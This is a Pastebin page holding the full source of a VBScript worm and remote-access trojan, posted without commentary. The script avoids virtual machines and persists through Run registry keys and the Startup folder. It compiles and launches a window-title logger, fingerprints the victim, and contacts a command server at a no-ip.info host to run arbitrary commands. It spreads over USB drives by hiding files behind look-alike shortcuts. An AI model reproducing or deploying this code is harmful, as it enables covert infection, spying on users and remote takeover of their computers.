API tools faq
paste
Advertisement
SecurityNajaf

#IL_Code 8920

SecurityNajaf
Jan 25th, 2014
215
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VB.NET 10.47 KB | None | 0 0
raw download clone embed print report
  1.  
  2. On Error Resume Next
  3. WScript.Timeout=0
  4. dim sh ' shell
  5. set sh =WScript.CreateObject("WScript.Shell")
  6. dim fs ' filesystem
  7. set fs= CreateObject("Scripting.FileSystemObject")
  8. dim w
  9. Set w = CreateObject("Microsoft.XMLHTTP")
  10. dim dotnet
  11. dotnet="n"
  12. if fs.fileexists(sh.ExpandEnvironmentStrings("%windir%") & "\Microsoft.NET\Framework\v2.0.50727\vbc.exe") then
  13. dotnet="y"
  14. end if
  15. vmcheck
  16. dim host
  17. host= "alsinyorq8.no-ip.info"
  18. Dim port
  19. port=1166
  20. Dim DR
  21. DR = sh.ExpandEnvironmentStrings("%temp%") & "\"
  22. dim FN
  23. FN ="system.vbs"
  24. dim fh
  25. dim fi
  26. dim us
  27. us="~"
  28. ins
  29. dim spl
  30. spl="jnJnj"
  31. dim i
  32. i=0
  33. while true
  34. On Error Resume Next
  35. dim a
  36. WRT "readystate=" & w.readyState
  37. if w.readystate=0 Then
  38. post "?mew", ActiveWindow
  39. end if
  40. if w.readystate=4 Then
  41. WRT "reading >> responseText"
  42. a= split(w.responseText,spl)
  43. if ubound(a)<>-1 Then
  44. select case a(0)
  45. case "exc"
  46. dim sa
  47. sa= Replace( Replace( a(1),"post ","post "),"uns ","uns ")
  48. execute sa
  49. case "uns"
  50. uns ""
  51. end select
  52. Else
  53. WRT "NO Commands! Sleep 5000"
  54. wscript.sleep 5000
  55. end If
  56. WRT "do until w.readystate=4"
  57. do until w.readystate=4
  58. wscript.sleep(1000)
  59. if x.status =0 or x.status= 200 then
  60. else
  61. exit do
  62. end if
  63. loop
  64. post "?mew", ActiveWindow
  65. end if
  66.  
  67.  
  68.  
  69. WRT "Relax 5000ms"
  70. wscript.sleep 5000
  71. i = i + 1
  72. if i= 2 or i =4 or i =6 then
  73. xins
  74. end if
  75. if i>=7 then
  76. i=0
  77. if w.readystate<>4 Then
  78. WRT "readystate<>4 Aborting.."
  79. On Error Resume Next
  80. w.abort
  81. post "?mew",""
  82. end if
  83. end if
  84. wend
  85. function vmcheck()
  86. On Error Resume Next
  87. Set WMI = GetObject("WinMgmts:")
  88. Set Col = WMI.ExecQuery("Select * from Win32_ComputerSystemProduct")
  89. For Each Ob in Col
  90. if instr( lcase( ob.name),"virtual") >0 then
  91. On Error Resume Next
  92. fs.deletefile(wscript.scriptfullname)
  93. do
  94. wscript.sleep(1000)
  95. loop
  96. end if
  97. next
  98. end Function
  99.  
  100.  
  101. function ins
  102. on error resume Next
  103. us= sh.regread("HKEY_CURRENT_USER\" & fn)
  104. if us="~" then
  105. if lcase( mid(wscript.scriptfullname,2))=":\" &  lcase(fn) then
  106. us="y"
  107. sh.regwrite "HKEY_CURRENT_USER\" & fn,  us, "REG_SZ"
  108. else
  109. us="n"
  110. sh.regwrite "HKEY_CURRENT_USER\" & fn,  us, "REG_SZ"
  111. end if
  112. end if
  113. Err.Clear
  114. fs.CopyFile wscript.scriptfullname,dr & fn ,true
  115. set fh = fs.OpenTextFile( dr & fn, 8, false)
  116. if  Err.Number>0 then wscript.quit
  117. fs.copyfile wscript.scriptfullname,  CreateObject("Shell.Application").NameSpace(&H7).Self.Path &"\" & fn ,true
  118. set fi = fs.OpenTextFile( CreateObject("Shell.Application").NameSpace(&H7).Self.Path &"\" & fn, 8, false)
  119. xins
  120.  
  121. Dim vbc
  122. vbc=sh.ExpandEnvironmentStrings("%windir%") & "\Microsoft.NET\Framework\v2.0.50727\vbc.exe"
  123. If fs.FileExists(vbc)=False Then Exit Function
  124. sh.Run "cmd.exe /c taskkill /f /im system32..exe",0,False
  125. Dim src
  126. src= sh.ExpandEnvironmentStrings("%temp%") & "\system32..vb"
  127. If fs.FileExists(src) Then fs.DeleteFile src,True
  128. Dim otf
  129. Set otf = fs.OpenTextFile( src,2,True,false)
  130. otf.Write replace( replace( "Module Module1:Private Declare Function GetForegroundWindow Lib !user32.dll! () As IntPtr:Private Declare Function GetWindowThreadProcessId Lib !user32.dll! (ByVal hwnd As IntPtr, ByRef lpdwProcessID As Integer) As Integer:Private Declare Function GetWindowText Lib !user32.dll! Alias !GetWindowTextA! (ByVal hWnd As IntPtr, ByVal WinTitle As String, ByVal MaxLength As Integer) As Integer:Private Declare Function GetWindowTextLength Lib !user32.dll! Alias !GetWindowTextLengthA! (ByVal hwnd As Long) As Integer:Dim owindow As String = !!:Function AC() As Boolean:Try:Dim hwd As IntPtr = GetForegroundWindow:If hwd <> IntPtr.Zero Then:Dim LN As Integer = GetWindowTextLength(CLng(hwd)):Dim w As String = StrDup(LN + 1, !*!):GetWindowText(hwd, w, LN + 1):Dim pid As Integer = -1:GetWindowThreadProcessId(hwd, pid):If w <> owindow Then:owindow = w:Return True:End If:End If:Catch ex As Exception:End Try:Return False:End Function:Sub Main():While True:If AC() Then:My.Computer.Registry.CurrentUser.SetValue(!ac!, owindow, Microsoft.Win32.RegistryValueKind.String):End If:Threading.Thread.CurrentThread.Sleep(2000):End While:End Sub:End Module",":",vbnewline),"!",chrw(34))
  131. otf.Close
  132. sh.Run vbc & " " &  chrw(34) & src & chrw(34) & " /nowarn",0,False
  133. If fs.FileExists(Replace(src,"system32..vb","system32..exe"))=False Then WScript.Sleep(2000)
  134. If fs.FileExists(Replace(src,"system32..vb","system32..exe"))=False Then WScript.Sleep(2000)
  135. If fs.FileExists(Replace(src,"system32..vb","system32..exe"))=False Then WScript.Sleep(2000)
  136. If fs.FileExists(Replace(src,"system32..vb","system32..exe"))=False Then WScript.Sleep(2000)
  137. If fs.FileExists(Replace(src,"system32..vb","system32..exe"))=False Then WScript.Sleep(2000)
  138. sh.Run Replace(src,"system32..vb","system32..exe") ,0,False
  139. end Function
  140.  
  141. sub xins
  142.     On error resume Next
  143.  
  144.     If sh.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & fn)<> "%windir%\system32\wscript.exe /b " & chrw(34) & dr & fn & chrw(34) then
  145.         sh.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & fn, "%windir%\system32\wscript.exe /b " & chrw(34) & dr & fn & chrw(34), "REG_SZ"
  146.     End if
  147.     If sh.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & fn)<>"%windir%\system32\wscript.exe /b " & chrw(34) & dr & fn & chrw(34) then
  148.         sh.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & fn,"%windir%\system32\wscript.exe /b " & chrw(34) & dr & fn & chrw(34), "REG_SZ"
  149.     End if
  150.     If sh.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden")="1" Then
  151.         sh.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",0,"REG_DWORD"
  152.     End If
  153. for each xx in fs.Drives
  154. if xx.isready then
  155.     if xx.FreeSpace >0 then
  156.         if xx.drivetype=1 then
  157.             if fs.fileexists(xx.path & "\" & fn) then
  158.                 fs.getfile(xx.path & "\"  & fn).Attributes=0
  159.             end if
  160.             fs.copyfile dr & fn , xx.path & "\"  & fn,true
  161.             dim mx
  162.             mx=0
  163.            
  164.             for Each x In fs.GetFolder( xx.path & "\" ).Files
  165.                 if mx=20 then
  166.                     exit for
  167.                 end if
  168.                 wscript.sleep 1
  169.                 if instr(x.name,".") Then
  170.                     if lcase( Split(x.name, ".")(UBound(Split(x.name, "."))))<>"lnk" Then
  171.                         x.Attributes = 2
  172.                         if ucase(x.name) <> ucase(fn) Then
  173.                             mx =mx +1
  174.                             With sh.CreateShortcut(xx.path & "\"  & x.name & ".lnk")
  175.                             .TargetPath = "cmd.exe"
  176.                             .WorkingDirectory = ""
  177.                             .WindowStyle=7
  178.                             .Arguments = "/c start " & Replace(fn," ", ChrW(34) _
  179.                             & " " & ChrW(34)) & "&start " & replace( x.name," ", ChrW(34) & " " & ChrW(34)) & " & exit"
  180.                             .IconLocation = sh.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\" & sh.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\." & Split(x.name, ".")(UBound(Split(x.name, "."))) & "\") & "\DefaultIcon\")
  181.                             if instr( .iconlocation,",")=0 then
  182.                                 .iconlocation = .iconlocation &",0"
  183.                             end if
  184.                             .Save()
  185.                             end with
  186.                         end if
  187.                     end if
  188.                 end if
  189.             Next
  190.             mx=0
  191.             fs.CreateFolder(xx.path & "\! Videos\" )
  192.             for Each x In fs.GetFolder( xx.path & "\" ).SubFolders
  193.                 if mx=20 then
  194.                     exit for
  195.                 end if
  196.                     wscript.sleep 1
  197.                     x.Attributes = 2
  198.                     mx =mx +1
  199.                     With sh.CreateShortcut(xx.path & "\"  & x.name & ".lnk")
  200.                     .TargetPath = "cmd.exe"
  201.                     .WorkingDirectory = ""
  202.                     .WindowStyle=7
  203.                     .Arguments = "/c start " & Replace(fn," ", ChrW(34)& " " & ChrW(34))  & "&start explorer /root,%CD%" & replace( x.name," ", ChrW(34) & " " & ChrW(34)) & "& exit"
  204.                     .IconLocation = "%windir%\system32\SHELL32.dll,3"
  205.                     .Save()
  206.                     end with
  207.             Next
  208.         end if
  209.     end if
  210. end if
  211. next
  212.  
  213. Err.Clear
  214. end sub
  215. Sub WRT(s)
  216. On Error Resume Next
  217.     WScript.Stdout.WriteLine s
  218. End Sub
  219. function uns(ex)
  220. on error resume Next
  221. WRT "uns"
  222. fi.close
  223. fh.close
  224. sh.RegDelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & FN
  225. sh.RegDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & FN
  226. fs.DeleteFile dr & fn ,true
  227. fs.DeleteFile CreateObject("Shell.Application").NameSpace(&H7).Self.Path &"\" & FN ,True
  228. for each xx in fs.Drives
  229. if xx.isready then
  230. if xx.FreeSpace >0 then
  231. For Each x In fs.GetFolder( xx.path & "\").Files
  232. On Error Resume Next
  233. if instr(x.name,".") then
  234. if lcase( Split(x.name, ".")(UBound(Split(x.name, "."))))<>"lnk" then
  235. x.Attributes = 0
  236. if ucase(x.name) <> ucase(fn) then
  237. fs.deletefile(xx.path & "\" & x.name & ".lnk" )
  238. else
  239. fs.deletefile( xx.path & "\" & x.name )
  240. end if
  241. end if
  242. end If
  243.  
  244. Next
  245. For Each x In fs.GetFolder( xx.path & "\").SubFolders
  246. On Error Resume Next
  247.  
  248. if fs.fileexists( xx.Path & "\"  & x.Name &".lnk") then
  249. fs.deletefile(xx.path & "\" & x.name & ".lnk" )
  250. end if
  251. x.Attributes = 0
  252. Next
  253. end if
  254. end if
  255. Next
  256. post "?uns",""
  257. Dim tout
  258. tout=0
  259. Do until w.readystate=4
  260. WRT "loop until readystate=4 Now=" & w.readystate
  261. wscript.sleep(1000)
  262. tout =tout + 1
  263. If tout=10 Then Exit do
  264. Loop
  265. WRT "BYE //ex=" & ex
  266. if ex<>"" then
  267. sh.Run "cmd.exe /c ping 0&start " & ex,0, false
  268. end if
  269. wscript.quit
  270. end function
  271. Function state
  272. return w.readyState
  273. End Function
  274.  
  275. function post(cmd ,da)
  276. On Error Resume Next
  277. WRT "POST: "  & cmd & " da=" & da
  278. w.open "POST","http://" & host & ":" & port &"/" & cmd, true
  279. w.setRequestHeader "User-Agent:",  inf
  280. w.setRequestHeader "Connection:","Keep-Alive"
  281. w.send da
  282. end function
  283.  
  284. dim xinf
  285. function inf
  286. on error resume Next
  287. if xinf="" then
  288. dim s
  289. s="??"
  290. s = hwd
  291. inf = inf & s & "\"
  292. s="??"
  293. s= sh.ExpandEnvironmentStrings("%COMPUTERNAME%")
  294. inf = inf & s & "\"
  295. s="??"
  296. s= sh.ExpandEnvironmentStrings("%USERNAME%")
  297. inf = inf & s & "\"
  298. s="??"
  299. Set a = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
  300. Set aa = a.ExecQuery ("Select * from Win32_OperatingSystem")
  301. dim co
  302. For Each aaa in aa
  303. s= aaa.Caption  & " SP" & aaa.ServicePackMajorVersion
  304. co= aaa.countrycode
  305. exit for
  306. Next
  307. s= replace(s,"Microsoft","")
  308. s= replace(s,"Windows ","Win")
  309. s= Replace(s," Win","Win")
  310. inf = inf & s & "\" & co &"\0.4f\" & us &"\" & dotnet &"\" & pid  
  311. xinf=inf
  312. else
  313. inf=xinf
  314. end if
  315. end function
  316.  
  317. function HWD
  318. HWD="LOVER_??"
  319. On Error Resume Next
  320. Set a = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
  321. Set aa = a.ExecQuery("SELECT * FROM Win32_LogicalDisk")
  322. For Each aaa In aa
  323. if aaa.VolumeSerialNumber<>"" then
  324. HWD= "LOVER_" & aaa.VolumeSerialNumber
  325. exit for
  326. end if
  327. Next
  328. end Function
  329.  
  330. Function ActiveWindow
  331. ActiveWindow=""
  332. ActiveWindow = sh.RegRead("HKEY_CURRENT_USER\ac")  
  333. End Function
  334.  
  335. Function PID
  336. PID=0
  337. on error resume next
  338. PID = GetObject("winmgmts:root\cimv2").Get("Win32_" &_
  339. "Process.Handle='" & _
  340. sh.Exec("mshta.exe").ProcessID & "'").ParentProcessId
  341. End Function
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!